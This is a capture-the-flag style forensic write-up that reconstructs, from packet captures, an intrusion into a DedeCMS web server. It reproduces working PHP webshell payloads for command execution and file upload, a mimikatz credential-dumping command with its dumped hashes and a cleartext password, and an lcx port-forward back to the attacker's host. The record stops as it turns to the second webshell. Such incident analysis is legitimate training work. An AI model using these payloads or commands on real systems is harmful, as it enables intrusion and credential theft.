Information Security Triathlon Finals (Data Track), Problem 4




All problems: https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00004.md


Someone is running a directory scan.
That pretty much settles who the likely attacker and the victim are:

Attacker: 172.16.10.110
Victim: 192.168.20.117

First, filter out all packets exchanged between these two.

PS:
It still seems more reliable to pull out all the packets between the attacker and the victim as soon as both have been identified.

#!/bin/bash
#attack_dump.sh
# Extract every packet involving the attacker or the victim from each capture.

target_folder='attack'

mkdir -p "${target_folder}"

for file in *.pcap; do
   echo "Dumping attack packets in ${file}..."
   # -s 0 keeps whole packets; -w writes raw pcap, so -A text decoding is not needed here
   tcpdump -s 0 'host 172.16.10.110 or host 192.168.20.117' -r "${file}" -w "${target_folder}/${file}"
   echo "${file} Done!"
done

The HTTP packets were dumped as well, as text.
Grepping that HTTP text directly still seems the fastest approach.

First, grep straight away to see whether there is a one-liner webshell or something similar.

888849-Connection: Keep-Alive
888850-Content-Type: text/plain
888851-
888852:<?php @eval($_POST['t'])?>
888853-17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1927878527:1927879124, ack 2736838709, win 64240, length 597
888854-E..}.k@...St..
888855-n...u"...r.... .5P.......POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

But it turned out to be a plain text file?

Scrolling a bit further up and down, I actually found a webshell.

This webshell seems to have some distinctive features,
for example:

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
array_map

Search on these features:

grep -n -C 5 'spider.html' http.txt | grep 'POST '

Sure enough, two webshells turned up:

/9.php
/uploadfile/2017/0905/20170905055411283.php

Presumably both webshells were written through a vulnerability.
Search directly for the first place 9.php appears.

Searching for /admin/file_manage_control.php shows this is DedeCMS (织梦CMS).
The vulnerability exploited should be this one:

http://www.cnblogs.com/LittleHann/p/4237578.html

We can see the attacker first used the vulnerability above to write 9.php to the server.

Searching for the other webshell, however, shows it being used straight away,
and its filename is a timestamp,
so it was presumably uploaded through a file upload vulnerability.

Based on the packet details, I found the following article:

http://0day5.com/archives/4368/ (phpcms v9 front-end GetShell)
This exploit uses a file named 1.txt.

Tracing further back,

the attacker turns out to have written the file 1.txt through 9.php.

Going back further still: to trigger the DedeCMS write of 9.php, the attacker needed the administrator password,
so there must have been a password brute-force before that.

grep -n 'POST ' http.txt | awk -F 'POST ' '{print $2}' | awk -F 'HTTP/1.1' '{print $1}' | sort | uniq -c

After searching, it turns out the attacker essentially already knew the back-end password: there was no brute-forcing, just a direct login.


gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC
gotopage=/admin/&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=

Username: admin
Password: 19901109

There are many ways the attacker could have known the password outright:
possibly obtained through SQL injection,
possibly through social engineering,
possibly through a sensitive-information leak, and so on.

On closer inspection it should not have been a plain (non-blind) injection,
because no other occurrences of the same string can be found in the capture.

I tried to check for a blind injection...
...possibly due to my limited ability, I could not work it out...

Next, let's see what the attacker did with the two webshells.
First, 9.php:

grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g'
grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' | tr -d '()";\\\' | tr -d "'"
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// Get system version, user name and similar information
C:\phpStudy\WWW  C:  Windows NT WANGGUAN-C938A1 5.2 build 3790 (Windows Server 2003 Enterprise x64 Edition Service Pack 2) i586(Administrator)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory
./   2017-09-05 17:34:52 0   0777
../ 2017-08-29 11:16:35 0   0777
a/  2017-09-05 16:05:51 0   0777
admin/  2017-09-05 16:05:51 0   0777
data/   2017-09-05 16:18:01 0   0777
images/ 2017-09-05 16:03:30 0   0777
include/    2017-09-05 16:03:21 0   0777
install/    2017-09-05 16:06:08 0   0777
member/ 2017-09-05 16:03:24 0   0777
phpMyAdmin/ 2017-08-29 11:16:15 0   0777
plus/   2017-09-05 16:05:51 0   0777
special/    2017-09-05 16:05:51 0   0777
templets/   2017-09-05 16:03:26 0   0777
uploads/    2017-09-05 16:05:51 0   0777
9.php   2017-09-05 17:34:52 26  0666
favicon.ico 2010-03-11 15:45:00 1150    0666
index.php   2010-02-07 17:05:00 738 0666
robots.txt  2010-02-07 17:05:00 505 0666
tags.php    2010-02-07 17:05:00 633 0666
wap.php 2010-02-07 17:05:00 3938    0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// Get system version, user name and similar information

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command whoami
wangguan-c938a1\administrator

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&ipconfig&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command ipconfig
Windows IP Configuration


Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.20.117
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&systeminfo&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command systeminfo
主机名:           WANGGUAN-C938A1
OS 名称:          Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS 版本:          5.2.3790 Service Pack 2 Build 3790
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Uniprocessor Free
注册的所有人:     wangguan
注册的组织:
产品 ID:          91353-645-7659413-50864
初始安装日期:     2017-8-29, 10:14:19
系统启动时间:     0 天 2 小时 55 分 11 秒
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: EM64T Family 6 Model 60 Stepping 3 GenuineIntel ~3400 Mhz
BIOS 版本:        UNKNOWN
Windows 目录:     C:\WINDOWS
系统目录:         C:\WINDOWS\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (GMT+08:00) 北京，重庆，香港特别行政区，乌鲁木齐
物理内存总量:     1,023 MB
可用的物理内存:   379 MB
虚拟内存: 最大值: 2,299 MB
虚拟内存: 可用:   1,854 MB
虚拟内存: 使用中: 445 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       \\WANGGUAN-C938A1
修补程序:         安装了 1 个修补程序。
                  [01]: Q147222
网卡:             安装了 1 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP:   是
                      DHCP 服务器: 192.168.20.1
                      IP 地址
                      [01]: 192.168.20.117
[S]

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\mimikatz.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a local file and save it as C:\\phpStudy\\WWW\\mimikatz.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command: C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt
// Use mimikatz.exe to harvest system passwords and write them to C:\\phpStudy\\WWW\\log.txt

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// Read file contents: C:\\phpStudy\\WWW\\log.txt
  .#####.   mimikatz 2.1.1 (x64) built on Apr  9 2017 23:24:20
 .## ^ ##.  "A La Vie, A L'Amour"                   
 ## / \ ##  /* * *                                  
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */
                                                    
mimikatz(commandline) # privilege::debug            
Privilege '20' OK                                   
                                                    
mimikatz(commandline) # sekurlsa::logonpasswords    
                                                    
Authentication Id : 0 ; 996 (00000000:000003e4)     
Session           : Service from 0                  
User Name         : NETWORK SERVICE                 
Domain            : NT AUTHORITY                    
Logon Server      : (null)                          
Logon Time        : 2017-9-5 14:40:42               
SID               : S-1-5-20                        
    msv :                                           
     [00000002] Primary                             
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * LM       : aad3b435b51404eeaad3b435b51404ee  
     * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0       
     * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
    wdigest :                                       
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    kerberos :                                      
     * Username : wangguan-c938a1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    ssp :                                           
    credman :                                       
                                                    
Authentication Id : 0 ; 216713 (00000000:00034e89)  
Session           : Interactive from 0              
User Name         : Administrator
Domain            : WANGGUAN-C938A1                 
Logon Server      : WANGGUAN-C938A1                 
Logon Time        : 2017-9-5 14:41:24               
SID               : S-1-5-21-2640452580-1396535521-4086226850-500
    msv :                                           
     [00000002] Primary                             
     * Username : Administrator                     
     * Domain   : WANGGUAN-C938A1
     * LM       : 1160eb40860de5aeb75e0c8d76954a50
     * NTLM     : 74e0fa3bf5a67fd3b43ed8912042fabb       
     * SHA1     : 9d464a83db1089ff0b49c72938d2806953594714
    wdigest :      
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    kerberos :     
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    ssp :       
    credman :   
                
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null) 
Logon Time        : 2017-9-5 14:40:42
SID               : S-1-5-19
    msv :       
    wdigest :   
    kerberos :     
     * Username : (null)  
     * Domain   : (null)  
     * Password : (null)  
    ssp :       
    credman :   
                
Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)          
Logon Time        : 2017-9-5 14:40:42
SID               : 
    msv :       
    wdigest :   
    kerberos :  
    ssp :       
    credman :                                                                    
                
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType f


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\log.txt';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read file contents: C:\\phpStudy\\WWW\\log.txt

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\DTools.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as: C:\\phpStudy\\WWW\\DTools.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\data\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\data\\common.inc.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Get file contents: C:\\phpStudy\\WWW\\data\\common.inc.php
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\data\\common.inc.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// Get file contents: C:\\phpStudy\\WWW\\data\\common.inc.php
<?php
//Database connection info
$cfg_dbhost = 'localhost';  
$cfg_dbname = 'dedecms';    
$cfg_dbuser = 'root';       
$cfg_dbpwd = 'root';        
$cfg_dbprefix = 'dede_';    
$cfg_db_language = 'gbk';                               
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\data\\22.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as: C:\\phpStudy\\WWW\\data\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\data\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command: C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\phpStudy\\WWW\\data\\22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command: C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as: C:\\Hscan***.zip

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as: C:\\Hscan***.zip

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\ directory
Documents and Settings/  2017-08-30 10:26:49 0   0777
phpStudy/   2017-08-29 11:16:35 0   0777
Program Files/  2017-08-29 10:19:09 0   0555
Program Files (x86)/    2017-08-29 10:10:05 0   0555
RECYCLER/   2017-08-29 11:24:41 0   0777
System Volume Information/  2017-08-29 10:15:42 0   0777
WINDOWS/    2017-09-05 17:50:05 0   0777
wmpub/  2017-08-29 10:11:11 0   0777
AUTOEXEC.BAT    2017-08-29 10:10:54 0   0777
boot.ini    2017-08-29 10:06:43 221 0666
bootfont.bin    2007-03-07 20:00:00 322730  0444
CONFIG.SYS  2017-08-29 10:10:54 0   0666
Hscan...........zip 2017-09-05 17:41:19 1170778 0666
IO.SYS  2017-08-29 10:10:54 0   0444
lcx.exe 2017-09-05 17:49:48 8704    0777
MSDOS.SYS   2017-08-29 10:10:54 0   0444
NTDETECT.COM    2007-03-07 20:00:00 47772   0555
ntldr   2007-03-07 20:00:00 306288  0444 
pagefile.sys    2017-09-05 14:40:40 1610612736  0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';;echo("X@Y");die();
// Write the file C:\\phpStudy\\WWW\\1.txt
<?php @eval($_POST['t'])?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

Now the other webshell file:

